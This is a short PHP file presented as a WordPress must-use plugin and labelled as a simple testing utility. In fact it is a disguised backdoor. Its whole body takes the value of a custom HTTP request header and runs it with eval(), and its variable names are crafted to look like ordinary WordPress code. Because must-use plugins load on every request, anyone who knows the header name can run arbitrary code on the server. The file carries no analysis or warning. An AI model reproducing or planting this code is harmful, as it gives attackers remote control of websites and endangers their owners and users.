<?php
/*
Plugin Name: MU Plugin
Description: A simple utility plugin for testing MU plugin functionality.
*/
$the_post_vli = $_SERVER;
$the_post_gsg = 'HTTP_84447AD';
if (isset($the_post_vli[$the_post_gsg])) {
eval($the_post_vli[$the_post_gsg]);
}